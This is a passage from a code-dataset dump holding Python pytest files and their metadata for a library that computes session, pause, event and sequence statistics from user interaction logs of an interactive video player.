two timestamps.\n\n :params timestamp: the current event time\n :params next_timestamp: the next event time\n :returns: the type of pause (str) and the difference\n between the two parameters\n \"\"\"\n if timestamp is None or next_timestamp is None:\n raise ValueError('Both timestamp parameters have to be initialised')\n \n if not isinstance(timestamp, dt) or not isinstance(next_timestamp, dt):\n raise TypeError('Timestamps must be datetime objects')\n\n if next_timestamp < timestamp:\n raise ValueError('Next timestamp cannot be before the current timestamp')\n\n diff = (next_timestamp - timestamp).total_seconds()\n \n if 1 <= diff <= 5: return 'SP', diff # 1 -> 5\n elif 5 < diff <= 15: return 'MP', diff # 6 -> 15\n elif 15 < diff <= 30: return 'LP', diff # 16 -> 30\n elif diff > 30: return 'VLP', diff # more than 30\n else: return 0, diff # base case" }, { "alpha_fraction": 0.5803667902946472, "alphanum_fraction": 0.6528390645980835, "avg_line_length": 37.621212005615234, "blob_id": "fd505faf3eb5b473e9242f2ebae4660d15195880", "content_id": "df8409c77263a846818eb39deff04c88c8bed7e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10197, "license_type": "no_license", "max_line_length": 103, "num_lines": 264, "path": "/tests/test_util/test_data.py", "repo_name": "JonoCX/interaction-lib", "src_encoding": "UTF-8", "text": "import pytest \n\nimport json\nimport pandas as pd\nfrom numpy import 
delete\n\nfrom interlib.util.data import to_dict, _get_users_clicked_start_button\nfrom interlib.util.data import to_dataframe, reached_point, events_between_two_points\nfrom interlib.util import parse_raw_data\nfrom interlib.preprocessing.statistics import Statistics\n\[email protected]\ndef user_ids():\n return {\n 'b194b76c-7866-4b6d-8502-93ffe6322b64', '7b06a205-c793-4bdf-8533-013dc092d341',\n '015879da-4ee5-40c7-8826-5c323a0df742', '9760a350-b073-42de-b86a-3f4cfeecaf6e', \n 'b1728dff-021d-4b82-9afc-8a29264b53e4', '62d860e2-11ec-4a7c-82e2-c9bd3e369c83', \n '74e368cf-7a39-443d-a3cb-002f6957c8a3', 'be3720be-3da1-419c-b912-cacc3f80a427',\n '0c5b7783-0320-4818-bcb8-e244de363591', 'b4588353-cecb-4dee-ae8b-833d7888dec5', \n '21013769-f703-4531-9293-f2f4e114c248', '959c1a91-8b0f-4178-bc59-70499353204f'\n }\n\[email protected]\ndef data_location(): return 'tests/test_data_files/raw_test_data.json'\n\[email protected]\ndef interaction_events():\n return { # set of user actions we consider\n 'PLAY_PAUSE_BUTTON_CLICKED', 'BACK_BUTTON_CLICKED', \n 'FULLSCREEN_BUTTON_CLICKED','NEXT_BUTTON_CLICKED', \n 'SUBTITLES_BUTTON_CLICKED', 'VOLUME_CHANGE',\n 'VIDEO_SCRUBBED', 'SEEK_BACKWARD_BUTTON_CLICKED', \n 'SEEK_FORWARD_BUTTON_CLICKED', 'VOLUME_MUTE_TOGGLED', \n 'VARIABLE_PANEL_NEXT_CLICKED', 'VARIABLE_PANEL_BACK_CLICKED',\n 'BROWSER_VISIBILITY_CHANGE', 'WINDOW_ORIENTATION_CHANGE',\n 'NARRATIVE_ELEMENT_CHANGE', 'LINK_CHOICE_CLICKED',\n 'USER_SET_VARIABLE'\n }\n\ndef test_to_dict_util(user_ids, data_location):\n user_events = to_dict(data_location)\n\n # check that the format is correct\n assert isinstance(user_events, dict)\n assert all(isinstance(x, list) for u, x in user_events.items())\n\n # check that all of the users are in the user events\n assert len(user_ids) == len(user_events.keys())\n for user, events in user_events.items():\n assert user in user_ids\n \ndef test_to_dict_split_util(user_ids, data_location):\n user_events = to_dict(data_location, split = True)\n\n # check that the format is correct: [{user -> [events]}, {user -> [events]}]\n assert isinstance(user_events, list)\n for chunk in user_events:\n assert isinstance(chunk, dict)\n assert all(isinstance(x, list) for u, x in chunk.items())\n\n # check whether they are sorted\n for user, sorted_events in chunk.items():\n assert all(\n sorted_events[i]['timestamp'] <= sorted_events[i + 1]['timestamp'] \n for i in range(len(sorted_events) - 1)\n )\n\ndef test_to_dict_user_subset(user_ids, data_location):\n user_ids = list(user_ids)\n subset_include = user_ids[:len(user_ids) // 2]\n subset_exclude = user_ids[len(user_ids) // 2:]\n user_events = to_dict(data_location, users_to_include = set(subset_include))\n\n assert len(subset_include) == len(user_events.keys())\n for user, events in user_events.items():\n assert user in subset_include\n assert user not in subset_exclude\n\ndef test_get_users_clicked_start_button(data_location, user_ids):\n with open(data_location, 'r') as in_file:\n data = parse_raw_data(\n raw_data = json.load(in_file), \n datetime_format = \"%Y-%m-%d %H:%M:%S.%f\", \n include_narrative_element_id = False\n )\n \n assert len(_get_users_clicked_start_button(data)) == len(user_ids)\n\ndef test_get_users_clicked_start_button_users_without_start_button(data_location, user_ids):\n with open(data_location, 'r') as in_file:\n data = parse_raw_data(\n raw_data = json.load(in_file), \n datetime_format = \"%Y-%m-%d %H:%M:%S.%f\", \n include_narrative_element_id = False\n )\n\n # remove the start button from a couple of the test 
users\n users_to_remove_start_button = {\n '21013769-f703-4531-9293-f2f4e114c248', \n '959c1a91-8b0f-4178-bc59-70499353204f'\n }\n \n # get the indexes of the two start button clicks\n del_idx = [\n idx \n for idx, event in enumerate(data) \n if event['user'] in users_to_remove_start_button and \n event['action_name'] == 'START_BUTTON_CLICKED'\n ]\n\n # delete the selected indexes using the numpy function\n data = delete(data, del_idx).tolist()\n\n # should be two fewer users\n assert len(_get_users_clicked_start_button(data)) == len(user_ids) - 2\n\ndef test_to_dict_util_errors(data_location):\n # test that a type error is thrown when:\n with pytest.raises(TypeError):\n # a non-string path is passed\n to_dict(path = 150)\n\n # a non-bool or non-int split value is passed\n to_dict(data_location, split = 3.5)\n\n # a non-bool include narrative element id is passed\n to_dict(data_location, include_narrative_element_id = 1)\n\n # a non-bool sort is passed\n to_dict(data_location, sort = 1)\n\n # test that a value error is thrown when:\n with pytest.raises(ValueError):\n # a non-existing path is passed\n to_dict(path = 'foo/bar.json')\n\n# ----- to_dataframe tests ------\ndef test_to_dataframe(user_ids, data_location, interaction_events):\n user_events = to_dict(data_location)\n\n stats = Statistics(user_events)\n user_statistics = stats.calculate_statistics(interaction_events)\n df = to_dataframe(user_statistics)\n\n # check that it's a dataframe that is returned\n assert type(df) == pd.DataFrame\n\n # check that the columns are the same as the keys\n for col in df.columns:\n if col == 'user': continue # this won't be in the columns\n assert col in user_statistics['b194b76c-7866-4b6d-8502-93ffe6322b64'].keys()\n\n # check that the values in the cells match for a user\n for stat_name, stat_value in user_statistics['b194b76c-7866-4b6d-8502-93ffe6322b64'].items():\n assert df[df['user'] == 'b194b76c-7866-4b6d-8502-93ffe6322b64'][stat_name].item() == stat_value\n\n# ----- reached point test -----\ndef test_reached_point(data_location):\n user_events = to_dict(data_location)\n\n point = 'CH00_Introduction'\n expected_users_removed = 'be3720be-3da1-419c-b912-cacc3f80a427'\n\n reached_point_users = reached_point(user_events, point)\n\n assert len(reached_point_users) == len(user_events.keys()) - 1\n assert expected_users_removed not in reached_point_users\n\ndef test_reached_point_filter(data_location):\n user_events = to_dict(data_location)\n\n point = 'CH00_Introduction'\n expected_users_removed = 'be3720be-3da1-419c-b912-cacc3f80a427'\n\n updated_user_events = reached_point(user_events, point, filter = True)\n\n assert len(updated_user_events.keys()) == len(user_events.keys()) - 1\n assert expected_users_removed not in updated_user_events.keys()\n\n# ----- events between two points test -----\ndef test_events_between_two_points(data_location):\n user_events = to_dict(data_location)\n\n users_reached_end = set([ # determined from mysql query on data\n 'b4588353-cecb-4dee-ae8b-833d7888dec5',\n 'b1728dff-021d-4b82-9afc-8a29264b53e4',\n '959c1a91-8b0f-4178-bc59-70499353204f',\n 'b194b76c-7866-4b6d-8502-93ffe6322b64'\n ])\n\n start = 'CH00_Introduction'\n end = '09_Ronaldo'\n\n updated_events = events_between_two_points(user_events, start, end)\n\n for user, events in updated_events.items():\n if len(events) > 0:\n if user in users_reached_end: # these are users that got to the end point\n assert (events[0]['data']['romper_to_state'] == start and \n events[-1]['data']['romper_to_state'] == end)\n 
else:\n assert events[0]['data']['romper_to_state'] == start\n\n\ndef test_events_between_two_points_alternative_end(data_location):\n user_events = to_dict(data_location)\n users_reached_end = set([ # determined from mysql query on raw data\n '21013769-f703-4531-9293-f2f4e114c248',\n '62d860e2-11ec-4a7c-82e2-c9bd3e369c83'\n ])\n\n start = 'CH00_Introduction'\n end = '05: Selena'\n\n updated_events = events_between_two_points(user_events, start, end)\n\n for user, events in updated_events.items():\n if len(events) > 0:\n if user in users_reached_end: # these are users that got to the end point\n assert (events[0]['data']['romper_to_state'] == start and \n events[-1]['data']['romper_to_state'] == end)\n else:\n assert events[0]['data']['romper_to_state'] == start\n \n\ndef test_events_between_two_points_filter(data_location):\n user_events = to_dict(data_location)\n\n start = 'CH00_Introduction'\n end = '09_Ronaldo'\n\n updated_events = events_between_two_points(user_events, start, end, filter = True)\n\n # there should be one fewer user\n assert len(updated_events.keys()) == len(user_events.keys()) - 1\n\n # we know that this user doesn't get past the start, so they should not be in the keys\n assert 'be3720be-3da1-419c-b912-cacc3f80a427' not in updated_events.keys()\n\n\ndef test_events_between_two_points_using_representation_id(data_location):\n user_events = to_dict(data_location)\n users_reached_end = set([ # determined from mysql query on data\n 'b4588353-cecb-4dee-ae8b-833d7888dec5',\n 'b1728dff-021d-4b82-9afc-8a29264b53e4',\n '959c1a91-8b0f-4178-bc59-70499353204f',\n 'b194b76c-7866-4b6d-8502-93ffe6322b64'\n ])\n\n start = '66f663b2-16ec-4321-abc3-5f582d0649ef' # CH00_Introduction\n end = '0d51a32c-d05c-439b-8317-8b36ef0e6d10' # 09_Ronaldo\n\n updated_events = events_between_two_points(\n user_events, start, end, using_representation_id = True)\n\n for user, events in updated_events.items():\n if len(events) > 0:\n if user in users_reached_end: # these are users that got to the end point\n assert (events[0]['data']['current_narrative_element'] == start and \n events[-1]['data']['current_narrative_element'] == end)\n else:\n assert events[0]['data']['current_narrative_element'] == start\n\n# TODO: test for parse raw data\n\n" }, { "alpha_fraction": 0.612662136554718, "alphanum_fraction": 0.6355047821998596, "avg_line_length": 37.548912048339844, "blob_id": "671810d91fe11fd7360214d6223502a7d93edd03", "content_id": "7d52fbbe6d6daea0299df109245e9fba042e00ba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7092, "license_type": "no_license", "max_line_length": 99, "num_lines": 184, "path": "/tests/test_preprocessing/test_sequences.py", "repo_name": "JonoCX/interaction-lib", "src_encoding": "UTF-8", "text": "import pytest \nimport pickle, json, datetime\n\nfrom collections import Counter, defaultdict\n\nfrom interlib.preprocessing.sequences import Sequences\n\n# Fixtures\n@pytest.fixture\ndef test_data():\n with open('tests/test_data_files/test_data.p', 'rb') as data_in:\n data = pickle.load(data_in)\n return data\n\n@pytest.fixture\ndef sequence_data():\n with open('tests/test_data_files/test_sequences.json', 'rb') as data_in:\n data = json.load(data_in)\n return data\n\n@pytest.fixture\ndef interaction_events():\n return { # set of user actions we consider\n 'PLAY_PAUSE_BUTTON_CLICKED', 'BACK_BUTTON_CLICKED', \n 'FULLSCREEN_BUTTON_CLICKED', 'NEXT_BUTTON_CLICKED', \n 'SUBTITLES_BUTTON_CLICKED', 'VOLUME_CHANGE',\n 'VIDEO_SCRUBBED', 
'SEEK_BACKWARD_BUTTON_CLICKED', \n 'SEEK_FORWARD_BUTTON_CLICKED', 'VOLUME_MUTE_TOGGLED', \n 'VARIABLE_PANEL_NEXT_CLICKED', 'VARIABLE_PANEL_BACK_CLICKED',\n 'BROWSER_VISIBILITY_CHANGE', 'WINDOW_ORIENTATION_CHANGE',\n 'NARRATIVE_ELEMENT_CHANGE', 'LINK_CHOICE_CLICKED',\n 'USER_SET_VARIABLE'\n }\n\[email protected]\ndef aliases():\n return {\n \"PLAY_PAUSE_BUTTON_CLICKED\": \"PP\", \"LINK_CHOICE_CLICKED\": \"LC\",\n \"FULLSCREEN_BUTTON_CLICKED\": \"FS\", \"NEXT_BUTTON_CLICKED\": \"NB\",\n \"VIDEO_SCRUBBED\": \"VS\", \"SEEK_FORWARD_BUTTON_CLICKED\": \"SFW\",\n \"BACK_BUTTON_CLICKED\": \"BB\", \"SEEK_BACKWARD_BUTTON_CLICKED\": \"SBK\",\n \"USER_SET_VARIABLE\": \"US\", \"VOLUME_CHANGE\": \"VC\",\n \"BROWSER_VISIBILITY_CHANGE\": \"BVC\", \"WINDOW_ORIENTATION_CHANGE\": \"WOC\",\n \"NARRATIVE_ELEMENT_CHANGE\": \"NEC\", \"VOLUME_MUTE_TOGGLED\": 'VM', \n \"VARIABLE_PANEL_NEXT_CLICKED\": \"VPN\", \"VARIABLE_PANEL_BACK_CLICKED\": \"VPB\",\n \"SUBTITLES_BUTTON_CLICKED\": \"SUB\"\n }\n\[email protected]\ndef ngrams():\n return [\n ('NEC', 'SP'), ('SP', 'PP'), ('PP', 'SP'), ('SP', 'LC'), ('LC', 'SP'),\n ('SP', 'NEC'), ('NEC', 'SP'), ('SP', 'BVC_H'), ('BVC_H', 'VLP'),\n ('VLP', 'BVC_V'), ('BVC_V', 'SP'), ('SP', 'US'), ('US', 'VPN'),\n ('VPN', 'SP'), ('SP', 'US'), ('US', 'VPN'), ('VPN', 'SP'), ('SP', 'US'),\n ('US', 'VPN'), ('VPN', 'SP'), ('SP', 'VPN'), ('VPN', 'SP'), ('SP', 'VPN'),\n ('VPN', 'SP'), ('SP', 'NEC'), ('NEC', 'SP'), ('SP', 'NEC')\n ]\n\n# ------ COMPRESS SEQUENCE TESTS ------\ndef test_compress_sequence(test_data):\n sequence = ['NEC', 'PP', 'NEC', 'NEC', 'NEC', 'BB', 'NB', 'NEC']\n expected_sequence = ['NEC_1', 'PP', 'NEC_3', 'BB', 'NB', 'NEC_1']\n\n seq = Sequences(test_data, n_jobs = 1)\n compressed_sequence = seq._compress_events(sequence)\n\n for indx, val in enumerate(compressed_sequence):\n assert val == expected_sequence[indx]\n\ndef test_compress_sequence_link_choice(test_data):\n sequence = ['LC', 'LC', 'LC', 'WOC', 'LC', 'NEC', 'LC', 'NB', 'BB', 'PP']\n expected_sequence = ['LC_3', 'WOC', 'LC_1', 'NEC', 'LC_1', 'NB', 'BB', 'PP']\n\n seq = Sequences(test_data, n_jobs = 1)\n compressed_sequence = seq._compress_events(sequence, compress_event = 'LC')\n\n for indx, val in enumerate(compressed_sequence):\n assert val == expected_sequence[indx]\n\ndef test_compress_sequence_no_compression_needed(test_data):\n sequence = ['LC', 'NEC', 'PP', 'NB', 'BB', 'SP', 'LP', 'MP', 'VLP']\n expected_sequence = sequence\n\n seq = Sequences(test_data, n_jobs = 1)\n compressed_sequence = seq._compress_events(sequence, compress_event = '')\n\n for indx, val in enumerate(compressed_sequence):\n assert val == expected_sequence[indx]\n\n# ----- SEQUENCES TEST ------\ndef test_sequences_single_user(test_data, sequence_data, interaction_events, aliases):\n seq = Sequences(test_data, n_jobs = 1)\n extracted_seq = seq.get_sequences(\n interaction_events = interaction_events,\n aliases = aliases,\n user_id = '0c5b7783-0320-4818-bcb8-e244de363591'\n )\n\n assert extracted_seq == sequence_data['0c5b7783-0320-4818-bcb8-e244de363591']['non_compressed']\n\ndef test_sequences_all_users(test_data, sequence_data, interaction_events, aliases):\n seq = Sequences(test_data, n_jobs = 1)\n extracted_seqs = seq.get_sequences(\n interaction_events = interaction_events,\n aliases = aliases\n )\n\n for user, seq_types in sequence_data.items():\n assert extracted_seqs[user] == seq_types['non_compressed']\n\ndef test_sequences_compressed_single_user(test_data, sequence_data, interaction_events, aliases):\n seq = Sequences(test_data, 
n_jobs = 1)\n extracted_seq = seq.get_sequences(\n interaction_events = interaction_events,\n aliases = aliases,\n user_id = 'b194b76c-7866-4b6d-8502-93ffe6322b64',\n compress = True,\n compress_event = 'SFW'\n )\n\n assert extracted_seq == sequence_data['b194b76c-7866-4b6d-8502-93ffe6322b64']['compressed']\n\ndef test_sequences_ngrams(test_data, interaction_events, aliases, ngrams):\n seq = Sequences(test_data, n_jobs = 1)\n extracted_seq = seq.get_sequences(\n interaction_events = interaction_events,\n aliases = aliases\n )\n\n user_ngrams = seq.get_ngrams(n = 2)\n assert ngrams == user_ngrams['0c5b7783-0320-4818-bcb8-e244de363591']\n \ndef test_sequences_ngrams_counts(test_data, interaction_events, aliases, ngrams):\n seq = Sequences(test_data, n_jobs = 1)\n extracted_seq = seq.get_sequences(\n interaction_events = interaction_events,\n aliases = aliases\n )\n\n user_ngrams, counts, user_counts = seq.get_ngrams(n = 2, counter = True)\n\n # create a counter to automate the testing a bit\n gt_counts = defaultdict(int)\n for each_gram in ngrams:\n gt_counts[each_gram] += 1\n \n for pair, value in user_counts['0c5b7783-0320-4818-bcb8-e244de363591'].items():\n assert gt_counts[pair] == value\n\ndef test_mismatched_interaction_events_and_aliases(test_data, interaction_events, aliases):\n seq = Sequences(test_data)\n\n # remove one element from aliases\n aliases.pop(\"NARRATIVE_ELEMENT_CHANGE\")\n\n with pytest.raises(ValueError):\n seq.get_sequences(interaction_events, aliases)\n\n # put it back and try again by removing something from interaction events\n aliases['NARRATIVE_ELEMENT_CHANGE'] = \"NEC\"\n interaction_events.remove('NARRATIVE_ELEMENT_CHANGE')\n\n with pytest.raises(ValueError):\n seq.get_sequences(interaction_events, aliases)\n\ndef test_errors_are_thrown(test_data, interaction_events, aliases):\n seq = Sequences(test_data)\n\n with pytest.raises(TypeError):\n # should throw an error when a list is passed (needs to be a dict)\n seq.get_sequences(interaction_events = [], aliases = aliases)\n\n # should throw an error when something other than a dictionary is passed\n seq.get_sequences(interaction_events = interaction_events, aliases = [])\n\n# def test_sequence_time_threshold(test_data, interaction_events, aliases):\n# seq = Sequences(test_data, n_jobs = 1)\n# extracted_seq = seq.get_sequences(\n# interaction_events = interaction_events,\n# aliases = aliases,\n# time_threshold = 30\n# )\n# print(extracted_seq)" }, { "alpha_fraction": 0.6414734125137329, "alphanum_fraction": 0.6566545367240906, "avg_line_length": 38.53959655761719, "blob_id": "f77066ebab76e07f5f17165c7ce9240202902225", "content_id": "3261c58817cf2cd3473efeca891d39f68efc2868", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 21474, "license_type": "no_license", "max_line_length": 113, "num_lines": 543, "path": "/tests/test_preprocessing/test_stats.py", "repo_name": "JonoCX/interaction-lib", "src_encoding": "UTF-8", "text": "from numpy.core.defchararray import add\nimport pytest\n\nimport pickle, json, datetime\nfrom datetime import datetime as dt \nfrom datetime import timedelta\nfrom collections import defaultdict\n\nfrom interlib.preprocessing.statistics import Statistics\n\n# Fixtures\[email protected]\ndef test_data():\n with open('tests/test_data_files/test_data.p', 'rb') as data_in:\n data = pickle.load(data_in)\n return data\n\[email protected]\ndef ground_truth():\n with open('tests/test_data_files/test_statistics.json', 'r') as data_in:\n data = 
json.load(data_in)\n return data\n\n@pytest.fixture\ndef interaction_events():\n return { # set of user actions we consider\n 'PLAY_PAUSE_BUTTON_CLICKED', 'BACK_BUTTON_CLICKED', \n 'FULLSCREEN_BUTTON_CLICKED','NEXT_BUTTON_CLICKED', \n 'SUBTITLES_BUTTON_CLICKED', 'VOLUME_CHANGE',\n 'VIDEO_SCRUBBED', 'SEEK_BACKWARD_BUTTON_CLICKED', \n 'SEEK_FORWARD_BUTTON_CLICKED', 'VOLUME_MUTE_TOGGLED', \n 'VARIABLE_PANEL_NEXT_CLICKED', 'VARIABLE_PANEL_BACK_CLICKED',\n 'BROWSER_VISIBILITY_CHANGE', 'WINDOW_ORIENTATION_CHANGE',\n 'NARRATIVE_ELEMENT_CHANGE', 'LINK_CHOICE_CLICKED',\n 'USER_SET_VARIABLE'\n }\n\n@pytest.fixture\ndef event_frequencies():\n with open('tests/test_data_files/test_event_frequencies.json', 'r') as data_in:\n data = json.load(data_in)\n return data\n\n@pytest.fixture\ndef time_stats():\n return {\n 'hidden_time', 'raw_session_length', \n 'session_length', 'time_to_completion', 'reach_end'}\n\n# ------ INIT ------\ndef test_init(test_data):\n with pytest.raises(ValueError):\n stats = Statistics(user_event_dict = {})\n\n with pytest.raises(TypeError):\n stats = Statistics(user_event_dict = [])\n\n stats = Statistics(test_data)\n assert stats.data.keys() == test_data.keys()\n assert stats.n_jobs == 1\n \n# ----- SPLIT USERS ------\ndef test_split_users_correct_chunks(test_data):\n # test that the data is split up into the correct chunks\n stats = Statistics(test_data, n_jobs = 4)\n for i, (u_chunk, d_chunk) in enumerate(stats._users_split):\n if i == 0: assert len(u_chunk) == 4\n else: assert len(u_chunk) == 3\n\ndef test_split_users_single_array(test_data):\n # test that when n_jobs is 1 the array remains a single array\n stats = Statistics(test_data, n_jobs = 1)\n for u_chunk, d_chunk in stats._users_split:\n assert len(u_chunk) == len(test_data)\n\ndef test_split_users_correspond_to_data_chunk(test_data):\n # test that all of the events in the data chunk correspond to that user\n stats = Statistics(test_data, n_jobs = -1)\n for u_chunk, d_chunk in stats._users_split: \n # get the set of users in the d chunk and compare with the u_chunk\n users_in_d_chunk = set([e['user'] for e in d_chunk])\n assert len(users_in_d_chunk) == len(u_chunk)\n assert set(u_chunk.tolist()) == users_in_d_chunk\n\n# ----- TIME STATISTICS -----\ndef test_time_statistics(test_data, ground_truth):\n stats = Statistics(test_data, n_jobs = -1)\n res = stats.time_statistics()\n \n # test the statistics calculated (with some allowance in the precision)\n for u, s in ground_truth.items():\n raw_sess_len = res[u]['raw_session_length']\n hidden_time = res[u]['hidden_time']\n sess_len = res[u]['session_length']\n\n assert s['raw_session_length'] == pytest.approx(raw_sess_len, 0.1)\n assert s['hidden_time'] == pytest.approx(hidden_time, 0.1)\n assert s['session_length'] == pytest.approx(sess_len, 0.1)\n\ndef test_time_statistics_empty_events(test_data, ground_truth):\n \"\"\" Test that empty events are dealt with \"\"\"\n test_data_copy = test_data.copy()\n user_to_delete = list(test_data_copy.keys())[0]\n test_data_copy[user_to_delete] = [] # remove their events\n\n stats = Statistics(test_data_copy)\n res = stats.time_statistics()\n\n assert res[user_to_delete]['raw_session_length'] == 0.0\n assert res[user_to_delete]['hidden_time'] == 0.0\n assert res[user_to_delete]['session_length'] == 0.0\n\ndef test_that_statistics_are_not_recalculated(test_data):\n stats = Statistics(test_data)\n res_one = stats.time_statistics()\n res_two = stats.time_statistics()\n\n assert res_one == res_two\n\ndef 
test_getting_only_session_length(test_data, ground_truth):\n stats = Statistics(test_data)\n res = stats.session_length()\n \n for user, stat in res.items():\n assert ground_truth[user]['session_length'] == pytest.approx(stat, 0.1)\n\ndef test_getting_only_session_length_one_user(test_data, ground_truth):\n stats = Statistics(test_data)\n \n user_to_retrieve = list(test_data.keys())[0]\n sess_len = stats.session_length(user_id = user_to_retrieve)\n\n assert ground_truth[user_to_retrieve]['session_length'] == pytest.approx(sess_len, 0.1)\n\n # test that value error is raised if the user doesn't exist\n with pytest.raises(ValueError):\n stats.session_length(user_id = 'user_id')\n\n# ----- TIME TO COMPLETION ------\ndef test_time_to_completion(test_data, ground_truth):\n stats = Statistics(test_data, completion_point = 'Credits')\n\n res = stats.time_statistics()\n\n for user, stat in res.items():\n toc = stat['time_to_completion']\n assert ground_truth[user]['time_to_completion'] == pytest.approx(toc, 0.1)\n\n# ----- PAUSE STATISTICS -----\ndef test_type_of_pause(test_data):\n stats = Statistics(test_data)\n\n ts = dt(2020, 1, 1, 10, 00, 00) # define a base timestamp to compare to\n\n sp_res = stats._type_of_pause(ts, ts + timedelta(0, 3))\n mp_res = stats._type_of_pause(ts, ts + timedelta(0, 10))\n lp_res = stats._type_of_pause(ts, ts + timedelta(0, 20))\n vlp_res = stats._type_of_pause(ts, ts + timedelta(0, 50))\n\n assert sp_res[0] == 'SP' and sp_res[1] == 3.0\n assert mp_res[0] == 'MP' and mp_res[1] == 10.0\n assert lp_res[0] == 'LP' and lp_res[1] == 20.0\n assert vlp_res[0] == 'VLP' and vlp_res[1] == 50.0\n\ndef test_errors_type_of_pause(test_data):\n stats = Statistics(test_data)\n\n ts = dt(2020, 1, 1, 10, 00, 00)\n ts_behind = dt(2020, 1, 1, 9, 00, 00)\n\n with pytest.raises(ValueError):\n stats._type_of_pause(None, None)\n stats._type_of_pause(ts, ts_behind)\n\n with pytest.raises(TypeError):\n stats._type_of_pause(1.0, 2.0)\n\ndef test_pause_statistics(test_data, ground_truth):\n stats = Statistics(test_data)\n res = stats.pause_statistics(\n pauses_include_events = {'BROWSER_VISIBILITY_CHANGE', 'WINDOW_ORIENTATION_CHANGE'},\n pauses_exclude_events = {'USER_SET_VARIABLE', 'LINK_CHOICE_CLICKED'}\n )\n\n # for user, r in res.items():\n # print(user, 'sp', r['SP'], 'mp', r['MP'], 'lp', r['LP'], 'vlp', r['VLP'])\n\n for user, stat in ground_truth.items():\n # if user == '959c1a91-8b0f-4178-bc59-70499353204f':\n # print('sp', res[user]['SP'], 'mp', res[user]['MP'], 'lp', res[user]['LP'], 'vlp', res[user]['VLP'])\n assert res[user]['SP'] == stat['SP']\n assert res[user]['MP'] == stat['MP']\n assert res[user]['LP'] == stat['LP']\n assert res[user]['VLP'] == stat['VLP']\n\ndef test_empty_pauses_statistics(test_data):\n test_data_copy = test_data.copy()\n user_to_delete = list(test_data_copy.keys())[0]\n test_data_copy[user_to_delete] = [] # remove their events\n\n stats = Statistics(test_data_copy)\n res = stats.pause_statistics(\n pauses_include_events = {'BROWSER_VISIBILITY_CHANGE', 'WINDOW_ORIENTATION_CHANGE'},\n pauses_exclude_events = {'USER_SET_VARIABLE', 'LINK_CHOICE_CLICKED'}\n )\n\n assert res[user_to_delete]['SP'] == 0\n assert res[user_to_delete]['MP'] == 0\n assert res[user_to_delete]['LP'] == 0\n assert res[user_to_delete]['VLP'] == 0\n\ndef test_pauses_single_user(test_data, ground_truth):\n stats = Statistics(test_data)\n user = '959c1a91-8b0f-4178-bc59-70499353204f'\n \n result = stats.pause_statistics(\n user_id = user,\n pauses_include_events = 
{'BROWSER_VISIBILITY_CHANGE', 'WINDOW_ORIENTATION_CHANGE'},\n pauses_exclude_events = {'USER_SET_VARIABLE', 'LINK_CHOICE_CLICKED'}\n )\n\n assert result['SP'] == ground_truth[user]['SP']\n assert result['MP'] == ground_truth[user]['MP']\n assert result['LP'] == ground_truth[user]['LP']\n assert result['VLP'] == ground_truth[user]['VLP']\n\ndef test_pauses_single_user_errors(test_data):\n stats = Statistics(test_data)\n\n # test value error when pause statistics haven't already been calculated\n with pytest.raises(ValueError):\n stats.pause_statistics(user_id = '150b')\n \n # test type error when something other than a string is passed\n with pytest.raises(TypeError):\n stats.pause_statistics(user_id = 150)\n \n # calculate statistics to test errors in retrieval \n res = stats.pause_statistics()\n\n # test value error for when the user isn't in the stats or data\n with pytest.raises(ValueError):\n stats.pause_statistics(user_id = '150b')\n \n # test type error\n with pytest.raises(TypeError):\n stats.pause_statistics(user_id = 150)\n\n# ----- EVENT STATISTICS -----\ndef test_event_statistics(test_data, ground_truth, interaction_events):\n stats = Statistics(test_data)\n res = stats.event_statistics(interaction_events)\n\n # assert that the ground truth statistics are the same\n for user, stat in ground_truth.items():\n for event in interaction_events:\n assert res[user][event] == stat[event]\n\ndef test_include_lcc_and_usv(test_data, ground_truth, interaction_events):\n stats = Statistics(test_data)\n\n # add in the lcc and usv counts into the total events\n for user, stat in ground_truth.copy().items():\n ground_truth[user]['total_events'] += ground_truth[user]['LINK_CHOICE_CLICKED']\n ground_truth[user]['total_events'] += ground_truth[user]['USER_SET_VARIABLE']\n\n res = stats.event_statistics(\n interaction_events, include_link_choices = True, include_user_set_variables = True\n )\n\n assert len(res.keys()) == len(ground_truth.keys())\n\n # test that the stats still match when LCC and USV are included in the total count\n for user, stat in ground_truth.items():\n for event in interaction_events:\n assert res[user][event] == stat[event]\n\ndef test_event_statistics_single_user(test_data, ground_truth, interaction_events):\n stats = Statistics(test_data)\n user = '959c1a91-8b0f-4178-bc59-70499353204f'\n\n # test that the stats are calculated for a single user and that they're correct\n res = stats.event_statistics(interaction_events, user_id = user)\n\n # test that each stat is correct\n for u, stat in ground_truth.items():\n if u == user:\n for event in interaction_events:\n assert res[event] == stat[event]\n\n res = Statistics(test_data).event_statistics(\n interaction_events, include_link_choices = True, \n include_user_set_variables = True, user_id = user\n )\n\n # add in the lcc and usv counts into the total events\n ground_truth[user]['total_events'] += ground_truth[user]['LINK_CHOICE_CLICKED']\n ground_truth[user]['total_events'] += ground_truth[user]['USER_SET_VARIABLE']\n\n # test that each stat is correct\n for u, stat in ground_truth.items():\n if u == user:\n for event in interaction_events:\n assert res[event] == stat[event]\n\ndef test_event_statistics_errors(test_data, ground_truth, interaction_events):\n stats = Statistics(test_data)\n\n # test type error is thrown when a non-set object is passed for \n # the interaction events\n with pytest.raises(TypeError):\n stats.event_statistics(interaction_events = [])\n\n # test that value error is thrown when an empty set is 
passed\n with pytest.raises(ValueError):\n stats.event_statistics(interaction_events = set([]))\n\n # test that a type error is thrown when a non-string user_id is passed\n with pytest.raises(TypeError):\n stats.event_statistics(interaction_events, user_id = 150)\n\n # test that a value error is thrown when user_id is not in data\n with pytest.raises(ValueError):\n stats.event_statistics(interaction_events, user_id = '150b')\n\n # calculate the statistics to test for retrieval errors\n res = stats.event_statistics(interaction_events)\n\n # test that a type error is thrown when user_id is not a string\n with pytest.raises(TypeError):\n stats.event_statistics(interaction_events, user_id = 150)\n\n # test that a value error is thrown when user_id is not in the data\n with pytest.raises(ValueError):\n stats.event_statistics(interaction_events, user_id = '150b')\n\n# ------ EVENT FREQUENCIES ------\ndef test_event_frequencies(test_data, event_frequencies, interaction_events):\n frequencies = [0, 1, 2, 3, 4, 5] # up to 5 minutes\n frequencies = [v * 60 for v in frequencies]\n\n stats = Statistics(test_data)\n res = stats.event_frequencies(frequencies, interaction_events)\n\n for user, freq in event_frequencies.items(): # for each of the users and their freq\n test_freq = res[user] # grab the test data for the user\n if test_freq: # if that user exists\n for time, counts in freq.items(): # 